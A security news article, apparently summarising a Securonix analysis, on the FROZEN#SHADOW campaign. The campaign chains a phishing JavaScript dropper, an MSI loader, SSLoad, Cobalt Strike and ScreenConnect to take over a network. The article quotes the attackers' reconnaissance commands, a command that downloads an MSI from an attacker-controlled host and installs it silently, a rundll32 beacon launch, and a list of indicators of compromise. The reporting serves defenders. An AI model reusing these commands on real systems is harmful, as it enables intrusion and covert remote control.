Friday, January 24, 2025
HomeCyber AttackNew SSLoad Malware Combined With Tools Hijacking Entire Network Domain

New SSLoad Malware Combined With Tools Hijacking Entire Network Domain

Published on

SIEM as a Service

Follow Us on Google News

A new attack campaign has been discovered to be employed by the FROZEN#SHADOW, which utilized SSLoad malware for its operations and Cobalt Strike Implants to pivot and take over the entire network.

In addition, the threat actors also used Remote Monitoring and management) software like ScreenConnect RMM for further control.

SSLoad is a well-designed malware that can stealthily infiltrate the systems, gather sensitive information, and exfiltrate the collected information back to the malware operators.

Moreover, the malware also leverages multiple backdoors and payloads to evade detection and maintain persistence.

Technical Analysis

This new attack campaign starts with a traditional phishing email containing a malicious link.

When users visit this link, it redirects them to mmtixmm[.]org URL to another download site where a JavaScript file is downloaded to the victim machine.

Is Your Network Under Attack? - Read CISO’s Guide to Avoiding the Next Breach - Download Free Guide

If this JavaScript file is manually executed, it performs several operations that will download and execute further payloads on the victim machine.

The targeting of these phishing email campaigns appears to be random, as the victims were in multiple countries, including Asia, Europe, and the Americas. 

Further investigations on the malware revealed that the attack takes place in different stages as follows:

  • Stage 1: Initial Execution – JavaScript
  • Stage 2: MSI File Execution
  • Stage 3: Malware Execution
  • Stage 4: Cobalt Strike Execution
  • Stage 5: RMM Software & Lateral Movement

Stage 1: Initial Execution – JavaScript

This initial stage involves the manual execution of the JavaScript file.

On analyzing the JS file out_czlrh.js, it was discovered that it consisted of 97.6% commented code with random characters to obfuscate the file.

However, removing the commented code revealed a crystal clear JS code that did not have any kind of obfuscation. 

JS file code with multiple commented code (Source: Securonix)

On analyzing the JS code, it was observed that the JS file performs multiple operations which starts with creating instances of ActiveXObject for WScript.Network and Scripting.FileSystemObject.

After this, the JS code, which contains “GetObject(“winmgmts:\\\\.\\root\\cimv2”),” tries to access WMI Object for simple command line operations.

Clean code after removing Comments from the JS code (Source: Securonix)

In addition, the code also sets up variables to manage the number of connection attempts and gather the connection status of a network share.

Further, the script also maps all the available drives to a network share located at \\wireoneinternet[.]info@80\share\.

The JS code also executes the “net use” command via WMI to map the network drive correctly.

After this, there is a three-second wait, after which it again runs the same command to confirm the mapping of the network drive.

Once all these steps are successfully completed, the script constructs a command to install an MSI package (slack.msi) from the mapped network drive using msiexec.exe.

Stage 2: MSI Execution

This slack.msi file is similar to the BazarBackdoor, often used by the TrickBot malware gang.

The malware was capable of filtrating networks and deploying additional payloads. However, after executing this slack.msi file, the malware communicates with multiple domains

  • wireoneinternet[.]info
  • skinnyjeanso[.]com
  • titnovacrion[.]top
  • Maramaravilha[.]com
  • globalsolutionunlimitedltd[.]com

Moreover, only after this is the SSLoad malware downloaded and executed.

The payloads of the SSLoad consist of a semi-randomly named DLL file, which is located in \%APPDATA%\local\digistamp\mbae-api-na.dll.

This DLL is, however, executed by Rundll32.exe, after which the DLL copies itself to %APPDATA%\Custom_update\. 

SSLoad DLL file details (Source: Securonix)

Stage 3: Malware Execution

In addition to the previous stage, the execution of the rundll32.exe command will also begin communication with two preconfigured C2 servers which are hxxps://skinnyjeanso[.]com/live/ and to hxxps://titnovacrion[.]top/live/. Following this, the malware begins to collect the system and user data for local host as well as the domain related information using following cmd.exe commands.

  • exe /c ipconfig /all
  • exe /c systeminfo
  • exe /c nltest /domain_trusts
  • exe /c nltest /domain_trusts /all_trusts
  • exe /c net view /all /domain
  • exe /c net view /all
  • exe /c net group “domain admins” /domain
  • exe /c wmic.exe /node:localhost /namespace:\\root\securitycenter2 path antivirusproduct get * /format:list
  • exe /c net config workstation
  • exe /c wmic.exe /node:localhost /namespace:\\root\securitycenter2 path antivirusproduct get displayname | findstr /v /b /c:displayname || echo no antivirus installed
  • exe /c whoami /groups

These collected information are then sent to the C2 servers via HTTPS connections. Once the threat actors receive this information from the infected system, they begin to execute some manual commands after confirming that the information is from a legitimate server and not from a honeypot. The manual commands executed by the threat actors are as follows:

  • exe -c “[console]::outputencoding = [console]::inputencoding = [system.text.encoding]::getencoding(‘utf-8’); cd c:\; powershell”
  • exe /groups
  • exe group “domain admins” /dom
  • exe /node:localhost /namespace:\\root\securitycenter2 path antivirusproduct get * /format:list

These commands were executed to manipulate and prob the server environment for the next stage of malware activities.

Stage 4: Cobalt Strike Beacon

This stage of the malware involves deploying the Cobalt Strike beacon on the systems after executing the manual commands.

Once this beacon is deployed, it becomes the primary means of communication for the C2. However, this beacon is dropped and executed via the following rundll32.exe command.

Rundll32.exe C:\ProgramData\msedge.dll,MONSSMRpgaTQssmrpgatq

Additionally, the threat actors also used this Cobalt Strike to download and install a ScreenConnect RMM software instance on the victim system using the following commands:

  • exe /c whoami /groups
  • exe /c wmic /node:localhost /namespace:\\root\securitycenter2 path antivirusproduct get * /format:list
  • exe /c iwr -uri “hxxps://t0talwar.screenconnect[.]com/bin/screenconnect.clientsetup.msi?e=access&y=guest&c=&c=tjx-usa.com&c=&c=dc&c=&c=&c=&c=” -outfile c:\programdata\msedgeview.msi
  • exe /c systeminfo
  • exe /c msiexec.exe /i C:\ProgramData\Msedgeview.msi /quiet /qn

Stage 5: RMM Software And Lateral Movement

Every single compromised system is controlled with the ScreenConnect RMM Software so as to maintain complete control on the system.

However, After this, the Lateral movement takes place by harvesting the credentials and other critical system details.

The enumeration of the environment is done using multiple PowerShell commands such as Invoke-ShareFinder, Find-DomainShare, and Get-DomainFileServer PowerShell commandlets.

The credential extraction is performed through which they can also obtain a domain admin account NTLM hash. 

Indicators Of Compromise

C2 Address

  • 85.239.54[.]190
  • 23.159.160[.]88
  • 23.95.209[.]148
  • 45.95.11[.]134
  • bjSdg0.pintaexoticfashion.co[.]in
  • l1-03.winupdate.us[.]to
  • 23-95-209-148-host.colocrossing[.]com:443
  • mmtixmm[.]org
  • wireoneinternet[.]info
  • skinnyjeanso[.]com
  • titnovacrion[.]top
  • simplyfitphilly[.]com
  • kasnackamarch[.]info
  • sokingscrosshotel[.]com
  • danteshpk[.]com
  • stratimasesstr[.]com
  • winarkamaps[.]com
  • globalsolutionunlimitedltd[.]com
  • maramaravilha[.]com
  • krd6[.]com
  • hxxps://t0talwar.screenconnect[.]com

Furthermore, a complete list of files/hashes used for this attack campaign can be found here.

Combat Email Threats with Easy-to-Launch Phishing Simulations: Email Security Awareness Training -> Try Free Demo 

Eswar
Eswar
Eswar is a Cyber security content editor with a passion for creating captivating and informative content. With years of experience under his belt in Cyber Security, he is covering Cyber Security News, technology and other news.

Latest articles

Subaru’s STARLINK Connected Car’s Vulnerability Let Attackers Gain Restricted Access

In a groundbreaking discovery on November 20, 2024, cybersecurity researchers Shubham Shah and a...

Android Kiosk Tablets Vulnerability Let Attackers Control AC & Lights

A security flaw found in Android-based kiosk tablets at luxury hotels has exposed a...

CISA Releases Six ICS Advisories Details Security Issues

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) issued six Industrial Control Systems (ICS)...

Juniper Routers Exploited via Magic Packet Vulnerability to Deploy Custom Backdoor

A sophisticated cyber campaign dubbed "J-magic" has been discovered targeting enterprise-grade Juniper routers with...

API Security Webinar

Free Webinar - DevSecOps Hacks

By embedding security into your CI/CD workflows, you can shift left, streamline your DevSecOps processes, and release secure applications faster—all while saving time and resources.

In this webinar, join Phani Deepak Akella ( VP of Marketing ) and Karthik Krishnamoorthy (CTO), Indusface as they explores best practices for integrating application security into your CI/CD workflows using tools like Jenkins and Jira.

Discussion points

Automate security scans as part of the CI/CD pipeline.
Get real-time, actionable insights into vulnerabilities.
Prioritize and track fixes directly in Jira, enhancing collaboration.
Reduce risks and costs by addressing vulnerabilities pre-production.

More like this

Android Kiosk Tablets Vulnerability Let Attackers Control AC & Lights

A security flaw found in Android-based kiosk tablets at luxury hotels has exposed a...

CISA Releases Six ICS Advisories Details Security Issues

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) issued six Industrial Control Systems (ICS)...

Beware of Fake Captcha Verifications Spreading Lumma Malware

In January, Netskope Threat Labs uncovered a sophisticated global malware campaign leveraging fake CAPTCHA...